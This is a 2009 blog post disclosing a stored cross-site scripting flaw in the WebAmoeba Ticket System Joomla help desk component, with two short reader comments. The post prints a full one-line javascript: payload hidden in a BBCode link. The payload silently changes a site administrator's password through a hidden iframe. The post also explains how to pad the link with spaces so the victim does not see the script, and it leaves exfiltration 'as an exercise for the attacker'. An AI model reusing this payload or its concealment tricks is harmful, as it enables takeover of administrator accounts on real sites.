Friday, 03 July 2009 15:31

I found a nice little exploit for WebAmoeba Ticket System 3.0.0, a Joomla help desk component. The vulnerability is with the BBCode library used to parse BBCode tags, as it does not strip javascript: urls from [url] tags.

To properly exploit this flaw, the attacker must have an account on the victim site and that account must have permissions to post new support tickets. Also, the BBCode parser must be on (this is the default setting). If these conditions are met, it is possible to inject a malicious link into the ticket message.

[url=javascript:/*http://google.com                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     */var exploited=false;foo=function(){var iframe=document.createElement('iframe');iframe.src='/index.php?option=com_user&task=edit&tmpl=component';document.body.appendChild(iframe);iframe.addEvent('load',payload);iframe.setStyle('display','none');function payload(e){if(exploited){location.href='http://google.com';}else{var doc=e.target.contentDocument;if(!doc)return;doc.getElementById('password').value='hackedpass';doc.getElementById('password2').value='hackedpass';doc.getElementsByTagName('form').item(0).submit();exploited=true;}}};foo();]http://google.com[/url]

A few pointers for this exploit: newlines are converted to <br> tags, so the exploit must be all on one line. Brackets get stripped by the BBCode regexp, so array notation won't work. The malicious url will also show in the status bar, though this can be mitigated somewhat by starting the exploit with a block comment containing a real url followed by a large line of spaces, which effectively pushes the script off the readable margin of the status bar, causing the victim to only see, for example, "javascript:/*http://google.com". This may be just enough to fool the unsuspecting admin.

This particular script appends a new, hidden iframe to the existing page, directs it to the user edit page, and changes the admin's password to 'hackedpass' before directing the existing page to the spoofed destination, google.com. There is no notification in this exploit to let the attacker know it has succeeded. To achieve this, the attacker would want to add a bit more script to submit this information elsewhere. I'll leave that as an exercise for the attacker.

Last Updated on Saturday, 04 July 2009 00:06
 
Comments (2)
1 Tuesday, 25 August 2009 15:58
Cris Papadatos
Hi. Thanks for the info, but how can we dissable bbcode??
2 Tuesday, 25 August 2009 17:48
Jeff Channell
I don't have it installed any more to check, but I'd imagine there's an option in the administrator control panel for it...

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions